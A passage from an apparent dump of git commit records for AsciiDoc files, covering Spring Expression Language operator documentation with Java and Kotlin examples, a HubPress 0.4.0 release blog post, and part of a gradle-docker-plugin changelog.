#queryName + ' is a member of the ' \" +\n\t\t\t\"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\";\n\n\tString queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String.class);\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tparser.parseExpression(\"Name\").setValue(societyContext, \"IEEE\")\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\")\n\n\texpression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" + \"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\"\n\n\tval queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String::class.java)\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n\nSee the next section on the Elvis operator for an even shorter syntax for the\nternary operator.\n\n\n\n[[expressions-operator-elvis]]\n=== The Elvis Operator\n\nThe Elvis operator is a shortening of the ternary operator syntax and is used in the\nhttp:\/\/www.groovy-lang.org\/operators.html#_elvis_operator[Groovy] language.\nWith the ternary operator syntax, you usually have to repeat a variable twice, as the\nfollowing example shows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes\"]\n----\n\tString name = \"Elvis Presley\";\n\tString displayName = (name != null ? name : \"Unknown\");\n----\n\nInstead, you can use the Elvis operator (named for the resemblance to Elvis' hair style).\nThe following example shows how to use the Elvis operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tString name = parser.parseExpression(\"name?:'Unknown'\").getValue(new Inventor(), String.class);\n\tSystem.out.println(name); \/\/ 'Unknown'\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval name = parser.parseExpression(\"name?:'Unknown'\").getValue(Inventor(), String::class.java)\n\tprintln(name) \/\/ 'Unknown'\n----\n\nThe following listing shows a more complex example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\tString name = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Nikola Tesla\n\n\ttesla.setName(null);\n\tname = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Elvis Presley\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\tvar name = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Nikola Tesla\n\n\ttesla.setName(null)\n\tname = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Elvis Presley\n----\n\n[NOTE]\n=====\nYou can use the Elvis operator to apply default 
values in expressions. The following\nexample shows how to use the Elvis operator in a `@Value` expression:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t@Value(\"#{systemProperties['pop3.port'] ?: 25}\")\n----\n\nThis will inject a system property `pop3.port` if it is defined or 25 if not.\n=====\n\n\n[[expressions-operator-safe-navigation]]\n=== Safe Navigation Operator\n\nThe safe navigation operator is used to avoid a `NullPointerException` and comes from\nthe http:\/\/www.groovy-lang.org\/operators.html#_safe_navigation_operator[Groovy]\nlanguage. Typically, when you have a reference to an object, you might need to verify that\nit is not null before accessing methods or properties of the object. To avoid this, the\nsafe navigation operator returns null instead of throwing an exception. The following\nexample shows how to use the safe navigation operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\ttesla.setPlaceOfBirth(new PlaceOfBirth(\"Smiljan\"));\n\n\tString city = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null);\n\tcity = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ null - does not throw NullPointerException!!!\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\ttesla.setPlaceOfBirth(PlaceOfBirth(\"Smiljan\"))\n\n\tvar city = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null)\n\tcity = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ null - does not throw NullPointerException!!!\n----\n\n\n\n[[expressions-collection-selection]]\n=== Collection Selection\n\nSelection is a powerful expression language feature that lets you transform a\nsource collection into another collection by selecting from its entries.\n\nSelection uses a syntax of `.?[selectionExpression]`. It filters the collection and\nreturns a new collection that contains a subset of the original elements. For example,\nselection lets us easily get a list of Serbian inventors, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tList<Inventor> list = (List<Inventor>) parser.parseExpression(\n\t\t\t\"Members.?[Nationality == 'Serbian']\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval list = parser.parseExpression(\n\t\t\t\"Members.?[Nationality == 'Serbian']\").getValue(societyContext) as List<Inventor>\n----\n\nSelection is possible on both lists and maps. For a list, the selection\ncriteria is evaluated against each individual list element. Against a map, the\nselection criteria is evaluated against each map entry (objects of the Java type\n`Map.Entry`). 
Each map entry has its key and value accessible as properties for use in\nthe selection.\n\nThe following expression returns a new map that consists of those elements of the original map\nwhere the entry value is less than 27:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMap newMap = parser.parseExpression(\"map.?[value<27]\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval newMap = parser.parseExpression(\"map.?[value<27]\").getValue()\n----\n\n\nIn addition to returning all the selected elements, you can retrieve only the\nfirst or the last value. To obtain the first entry matching the selection, the syntax is\n`.^[selectionExpression]`. To obtain the last entry matching the selection, the syntax is\n`.$[selectionExpression]`.\n\n\n\n[[expressions-collection-projection]]\n=== Collection Projection\n\nProjection lets a collection drive the evaluation of a sub-expression, and the\nresult is a new collection. The syntax for projection is `.![projectionExpression]`. For\nexample, suppose we have a list of inventors but want the list of\ncities where they were born. Effectively, we want to evaluate 'placeOfBirth.city' for\nevery entry in the inventor list. The following example uses projection to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ returns ['Smiljan', 'Idvor']\n\tList placesOfBirth = (List) parser.parseExpression(\n\t\t\t\"Members.![placeOfBirth.city]\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ returns ['Smiljan', 'Idvor']\n\tval placesOfBirth = parser.parseExpression(\n\t\t\t\"Members.![placeOfBirth.city]\").getValue(societyContext) as List<*>\n----\n\nYou can also use a map to drive projection and, in this case, the projection expression is\nevaluated against each entry in the map (represented as a Java `Map.Entry`). The result\nof a projection across a map is a list that consists of the evaluation of the projection\nexpression against each map entry.\n\n\n\n[[expressions-templating]]\n=== Expression Templating\n\nExpression templates allow mixing literal text with one or more evaluation blocks.\nEach evaluation block is delimited with prefix and suffix characters that you can\ndefine. A common choice is to use `#{ }` as the delimiters, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tnew TemplateParserContext()).getValue(String.class);\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tTemplateParserContext()).getValue(String::class.java)\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n\nThe string is evaluated by concatenating the literal text `'random number is '` with the\nresult of evaluating the expression inside the `#{ }` delimiter (in this case, the result\nof calling that `random()` method). The second argument to the `parseExpression()` method\nis of the type `ParserContext`. 
The `ParserContext` interface is used to influence how\nthe expression is parsed in order to support the expression templating functionality.\nThe definition of `TemplateParserContext` follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class TemplateParserContext implements ParserContext {\n\n\t\tpublic String getExpressionPrefix() {\n\t\t\treturn \"#{\";\n\t\t}\n\n\t\tpublic String getExpressionSuffix() {\n\t\t\treturn \"}\";\n\t\t}\n\n\t\tpublic boolean isTemplate() {\n\t\t\treturn true;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass TemplateParserContext : ParserContext {\n\n\t\toverride fun getExpressionPrefix(): String {\n\t\t\treturn \"#{\"\n\t\t}\n\n\t\toverride fun getExpressionSuffix(): String {\n\t\t\treturn \"}\"\n\t\t}\n\n\t\toverride fun isTemplate(): Boolean {\n\t\t\treturn true\n\t\t}\n\t}\n----\n\n\n[[expressions-example-classes]]\n== Classes Used in the Examples\n\nThis section lists the classes used in the examples throughout this chapter.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Inventor.Java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.Date;\n\timport java.util.GregorianCalendar;\n\n\tpublic class Inventor {\n\n\t\tprivate String name;\n\t\tprivate String nationality;\n\t\tprivate String[] inventions;\n\t\tprivate Date birthdate;\n\t\tprivate PlaceOfBirth placeOfBirth;\n\n\t\tpublic Inventor(String name, String nationality) {\n\t\t\tGregorianCalendar c= new GregorianCalendar();\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = c.getTime();\n\t\t}\n\n\t\tpublic Inventor(String name, Date birthdate, String nationality) {\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic Inventor() {\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic String getNationality() {\n\t\t\treturn nationality;\n\t\t}\n\n\t\tpublic void setNationality(String nationality) {\n\t\t\tthis.nationality = nationality;\n\t\t}\n\n\t\tpublic Date getBirthdate() {\n\t\t\treturn birthdate;\n\t\t}\n\n\t\tpublic void setBirthdate(Date birthdate) {\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic PlaceOfBirth getPlaceOfBirth() {\n\t\t\treturn placeOfBirth;\n\t\t}\n\n\t\tpublic void setPlaceOfBirth(PlaceOfBirth placeOfBirth) {\n\t\t\tthis.placeOfBirth = placeOfBirth;\n\t\t}\n\n\t\tpublic void setInventions(String[] inventions) {\n\t\t\tthis.inventions = inventions;\n\t\t}\n\n\t\tpublic String[] getInventions() {\n\t\t\treturn inventions;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Inventor.kt\n----\nclass Inventor(\n\tvar name: String,\n\tvar nationality: String,\n\tvar inventions: Array<String>? = null,\n\tvar birthdate: Date = GregorianCalendar().time,\n\tvar placeOfBirth: PlaceOfBirth? 
= null)\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.PlaceOfBirth.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\tpublic class PlaceOfBirth {\n\n\t\tprivate String city;\n\t\tprivate String country;\n\n\t\tpublic PlaceOfBirth(String city) {\n\t\t\tthis.city=city;\n\t\t}\n\n\t\tpublic PlaceOfBirth(String city, String country) {\n\t\t\tthis(city);\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getCity() {\n\t\t\treturn city;\n\t\t}\n\n\t\tpublic void setCity(String s) {\n\t\t\tthis.city = s;\n\t\t}\n\n\t\tpublic String getCountry() {\n\t\t\treturn country;\n\t\t}\n\n\t\tpublic void setCountry(String country) {\n\t\t\tthis.country = country;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.PlaceOfBirth.kt\n----\n\tclass PlaceOfBirth(var city: String, var country: String? = null)\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Society.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.*;\n\n\tpublic class Society {\n\n\t\tprivate String name;\n\n\t\tpublic static String Advisors = \"advisors\";\n\t\tpublic static String President = \"president\";\n\n\t\tprivate List<Inventor> members = new ArrayList<Inventor>();\n\t\tprivate Map officers = new HashMap();\n\n\t\tpublic List getMembers() {\n\t\t\treturn members;\n\t\t}\n\n\t\tpublic Map getOfficers() {\n\t\t\treturn officers;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic boolean isMember(String name) {\n\t\t\tfor (Inventor inventor : members) {\n\t\t\t\tif (inventor.getName().equals(name)) {\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Society.kt\n----\n\tpackage org.spring.samples.spel.inventor\n\n\timport java.util.*\n\n\tclass Society {\n\n\t\tval Advisors = \"advisors\"\n\t\tval President = \"president\"\n\n\t\tvar name: String? = null\n\n\t\tval members = ArrayList<Inventor>()\n\t\tval officers = mapOf<Any, Any>()\n\n\t\tfun isMember(name: String): Boolean {\n\t\t\tfor (inventor in members) {\n\t\t\t\tif (inventor.name == name) {\n\t\t\t\t\treturn true\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"766c97d34765858bf3dbbaddafb13c057d3995cb","subject":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","message":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","repos":"HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_contents":"= Update: What's New in Version 0.4.0\n:hp-tags: release\n\nIt's been a year since HubPress launched. How time flies!\n\n1,976 forks.\n\n2,205 stars.\n\nHundreds of progressive blogs using HubPress and Asciidoctor to write scaleable content, in an easy-to-use product. 
\n\nBest of all, it's totally free!\n\n== Material design\n\nTo give HubPress a modern, progressive User Interface, we've redesigned it using the Material design template.\n\nThis provides an even better responsive design for mobile users, and provides a clean interface for new and existing blogger.\n\n== Development process\n\nHubPress is moving away from developing in the https:\/\/github.com\/HubPress\/hubpress.io[hubpress.io] repository. \nTo ensure the hubpress.io repository remains clean for new adopters, development has shifted to https:\/\/github.com\/HubPress\/dev.hubpress.io[dev.hubpress.io].\n\nThe process to commit a change to HubPress is changed to the following:\n\n. Create an issue describing the change you propose.\n. Fork https:\/\/github.com\/HubPress\/dev.hubpress.io\n. Checkout the branch *development*\n. Create a branch in your forked repo and make the change.\n. Open a Pull Request (PR), and summarise your changes, linking to the issue you created.\n\nOnce we receive your PR, we'll review your changes and then either accept them or ask for further changes before final acceptance.\n\nThe new repository is backed by Continuous Integration tasks provisioned through Travis-CI, which trigger automatically once a change to `\/master` is detected.\n\nIt's a more scalable way to manage HubPress moving forward.\n\n== Theme\n\nHubPress uses the professional-looking Ghost themes to allow you to personalise your Blog. It's been a year since release, so it's time for a couple of new looks. \n\nuno-zen::\n This theme, created by https:\/\/twitter.com\/kikobeats[Kiko Beats], is a simplified theme you can use for a more \"docs-site\" looking blog:\n * Great for long-form blogs, \n * Looks great with pinned posts.\n\nghostium::\n This theme, created by https:\/\/twitter.com\/oswaldoacauan[Oswaldo Acauan], is focused on content and based on Medium:\n * Focused on content, \n * Fully responsive.","old_contents":"= Update: What's New in Version 0.4.0\n:hp-tags: release\n\nIt's been a year since HubPress launched. How time flies!\n\n1,976 forks.\n\n2,205 stars.\n\nHundreds of progressive blogs using HubPress and Asciidoctor to write scaleable content, in an easy-to-use product. \n\nBest of all, it's totally free!\n\n== Material design\n\nTo give HubPress a modern, progressive User Interface, we've redesigned it using the Material design template.\n\nThis provides an even better responsive design for mobile users, and provides a clean interface for new and existing blogger.\n\n== Development process\n\nHubPress is moving away from developing in the https:\/\/github.com\/HubPress\/hubpress.io[hubpress.io] repository. \nTo ensure the hubpress.io repository remains clean for new adopters, development has shifted to https:\/\/github.com\/HubPress\/dev.hubpress.io[dev.hubpress.io].\n\nThe process to commit a change to HubPress is changed to the following:\n\n. Create an issue describing the change you propose.\n. Fork https:\/\/github.com\/HubPress\/dev.hubpress.io\n. Checkout the branch *development*\n. Create a branch in your forked repo and make the change.\n. 
Open a Pull Request (PR), and summarise your changes, linking to the issue you created.\n\nOnce we receive your PR, we'll review your changes and then either accept them or ask for further changes before final acceptance.\n\nThe new repository is backed by Continuous Integration tasks provisioned through Travis-CI, which trigger automatically once a change to `\/master` is detected.\n\nIt's a more scalable way to manage HubPress moving forward.\n\n== Theme\n\nHubPress uses the professional-looking Ghost themes to allow you to personalise your Blog. It's been a year since release, so it's time for a couple of new looks. \n\nuno-zen::\n This theme, cerated by https:\/\/twitter.com\/kikobeats[Kiko Beats] is a simplified theme you can use for a more \"docs-site\" looking blog:\n * Great for long-form blogs, \n * Looks great with pinned posts.\n\nghostium::\n This theme, created by https:\/\/twitter.com\/oswaldoacauan[Oswaldo Acauan] is focused on content and based on Medium:\n * Focused on content, \n * Fully responsive.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"01a3c96e7287905cb8d7c09f4d3a98f649232c82","subject":"Add fix to change log","message":"Add fix to change log\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n * Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n * Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n * Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n * Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - 
{uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure-proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to Java strings. - {uri-github}\/pull\/617[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/617[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDEs. - {uri-github}\/pull\/617[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. 
- {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. Its `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fall back to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fall back to the just-created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running container's logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time, issue a stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now named differently in `docker-java`. 
- {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific IPv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create the file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during Gradle's config phase. 
